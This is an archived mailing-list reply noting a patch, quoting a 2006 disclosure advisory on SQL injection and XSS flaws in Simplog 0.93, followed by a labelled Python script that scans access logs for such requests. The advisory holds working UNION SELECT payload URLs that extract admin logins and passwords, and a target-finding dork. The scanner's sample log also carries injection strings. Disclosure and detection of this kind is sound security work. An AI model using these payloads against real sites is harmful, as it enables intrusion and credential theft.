<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7638.1">
<TITLE>RE: Advisory: Simplog <= 0.93 Multiple Remote Vulnerabilities.</TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->
<BR>
<P><FONT SIZE=2>patched in version 0.9.3.1<BR>
<BR>
-----Original Message-----<BR>
From: Mustafa Can Bjorn IPEKCI [<A HREF="mailto:nukedx@nukedx.com">mailto:nukedx@nukedx.com</A>]<BR>
Sent: Fri 4/21/2006 2:54 PM<BR>
To: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com; support@simplog.org<BR>
Subject: Advisory: Simplog <= 0.93 Multiple Remote Vulnerabilities.<BR>
<BR>
<BR>
--Security Report--<BR>
Advisory: Simplog <= 0.93 Multiple Remote Vulnerabilities.<BR>
---<BR>
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI<BR>
---<BR>
Date: 21/04/06 22:13 PM<BR>
---<BR>
Contacts:{<BR>
ICQ: 10072<BR>
MSN/Email: nukedx@nukedx.com<BR>
Web: <A HREF="http://www.nukedx.com">http://www.nukedx.com</A><BR>
}<BR>
---<BR>
Vendor: Simplog (<A HREF="http://www.simplog.org/">http://www.simplog.org/</A>)<BR>
Version: 0.93 and prior versions must be affected.<BR>
About: Via these methods a remote attacker can inject arbitrary SQL queries into the<BR>
tid parameter in preview.php,<BR>
cid, pid and eid in archive.php and pid in comments.php. As you know, rgod<BR>
published an advisory about version 0.92 but he<BR>
did not notice these SQL injections. He found other SQL injections in<BR>
archive.php but did not find these vulnerabilities.<BR>
Also there is a cross site scripting vulnerability in imagelist.php's imagedir<BR>
parameter.<BR>
Level: Critical<BR>
---<BR>
How&Example:<BR>
SQL Injection :<BR>
Needs MySQL > 4.0<BR>
GET -> http://[victim]/[simplogdir]/preview.php?adm=tem&blogid=1&tid=[SQL]<BR>
GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&cid=[SQL]<BR>
GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&pid=[SQL]<BR>
GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&eid=[SQL]<BR>
EXAMPLE -><BR>
<BR>
http://[victim]/[simplogdir]/preview.php?adm=tem&blogid=1&tid=-1/**/UNION/**/SELECT/**/<BR>
concat(25552,login,25553,password,25554)/**/from/**/blog_users/**/where/**/admin=1/*<BR>
EXAMPLE -><BR>
<BR>
http://[victim]/[simplogdir]/archive.php?blogid=1&cid=-1/**/UNION/**/SELECT/**/0,null,0,email,0,0,login,<BR>
password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/*<BR>
EXAMPLE -><BR>
<BR>
http://[victim]/[simplogdir]/archive.php?blogid=1&pid=-1/**/UNION/**/SELECT/**/0,null,0,email,0,0,login,<BR>
password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/*<BR>
EXAMPLE -><BR>
<BR>
http://[victim]/[simplogdir]/archive.php?blogid=1&eid=-1/**/UNION/**/SELECT/**/0,null,0,email,0,0,login,<BR>
password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/*<BR>
EXAMPLE -><BR>
<BR>
http://[victim]/[simplogdir]/comments.php?blogid=1&pid=-1/**/UNION/**/SELECT/**/0,null,0,email,0,0,login,<BR>
password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/*<BR>
With these examples a remote attacker can leak the specified admin's login<BR>
information from the database.<BR>
<BR>
XSS:<BR>
GET -><BR>
<BR>
http://[victim]/[simplogdir]/imagelist.php?blogid=1&act=add_entry&login=1&imagedir=[XSS]<BR>
<BR>
---<BR>
Timeline:<BR>
* 21/04/2006: Vulnerability found.<BR>
* 21/04/2006: Contacted vendor and waiting for reply.<BR>
---<BR>
Exploit:<BR>
<A HREF="http://www.nukedx.com/?getxpl=25">http://www.nukedx.com/?getxpl=25</A><BR>
---<BR>
Dorks: "powered by simplog"<BR>
---<BR>
Original advisory can be found at: <A HREF="http://www.nukedx.com/?viewdoc=25">http://www.nukedx.com/?viewdoc=25</A><BR>
<BR>
<BR>
</FONT>
</P>
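<P><FONT SIZE=2>Added detection example, not part of the advisory, of Simplog, or of either poster's message: the script below scans constructed Apache-style access-log lines for requests to the endpoints the advisory names whose id parameters (tid, cid, pid, eid) carry anything other than a plain integer, or whose imagedir value contains HTML metacharacters. The log lines, hosts and paths are constructed for the example; it assumes Python 3 and the standard library only.</FONT></P>

```python
import re
from urllib.parse import parse_qs, urlsplit

# Parameters the advisory names as injectable, per Simplog script. The
# application treats them as numeric ids, so any other value is suspect.
INT_PARAMS = {
    "preview.php": {"tid"},
    "archive.php": {"cid", "pid", "eid"},
    "comments.php": {"pid"},
}
XSS_PARAMS = {"imagelist.php": {"imagedir"}}  # value is reflected into the page

INT_RE = re.compile(r"^-?\d+$")
REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')  # target in a combined-format line

def check_request(target):
    """Return findings for one request target (path plus query string)."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    findings = []
    for name in INT_PARAMS.get(script, ()):
        for value in query.get(name, []):
            if not INT_RE.match(value):  # empty or non-numeric id -> flag it
                findings.append(f"sqli? {script} {name}={value!r}")
    for name in XSS_PARAMS.get(script, ()):
        for value in query.get(name, []):
            if re.search(r'[<>"\']', value):
                findings.append(f"xss? {script} {name}={value!r}")
    return findings

def scan_log(lines):
    """Scan access-log lines; return (line_number, finding) pairs."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        if m:
            hits.extend((n, f) for f in check_request(m.group(1)))
    return hits

# Constructed sample log (Apache combined format, fictional hosts and paths).
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Apr/2006:14:54:01 +0000] "GET /simplog/preview.php?adm=tem&blogid=1&tid=3 HTTP/1.1" 200 4120',
    '10.0.0.5 - - [21/Apr/2006:14:54:02 +0000] "GET /simplog/preview.php?adm=tem&blogid=1&tid=-1%2F**%2FUNION%2F**%2FSELECT%2F**%2F1 HTTP/1.1" 200 4120',
    '10.0.0.6 - - [21/Apr/2006:14:54:03 +0000] "GET /simplog/archive.php?blogid=1&cid=7 HTTP/1.1" 200 2210',
    '10.0.0.6 - - [21/Apr/2006:14:54:04 +0000] "GET /simplog/archive.php?blogid=1&eid=-1/**/UNION/**/SELECT/**/1 HTTP/1.1" 200 2210',
    '10.0.0.7 - - [21/Apr/2006:14:54:05 +0000] "GET /simplog/imagelist.php?blogid=1&act=add_entry&login=1&imagedir=images%3Cb%3E HTTP/1.1" 200 900',
    '10.0.0.7 - - [21/Apr/2006:14:54:06 +0000] "GET /simplog/imagelist.php?blogid=1&act=add_entry&login=1&imagedir=images HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for n, finding in scan_log(SAMPLE_LOG):
        print(f"line {n}: {finding}")
```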
</BODY>
</HTML>